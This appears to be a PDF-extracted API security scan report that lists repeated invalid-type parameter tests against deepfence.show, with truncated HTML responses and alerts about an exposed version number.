src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1944\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io12.45E+12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1945\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.io-1.23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1946\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioSoapUI is the best\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1947\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioP1Y2M3DT10H30M12.3S\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1948\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1999-05-31T13:20:00.000-05:00\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1949\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1999-05-31\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1950Scan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-1267896799\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1951\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-882223334991111111\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1952\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-2147483647\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1953\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-32768\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1954\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io127\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1955\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1956\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1957\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 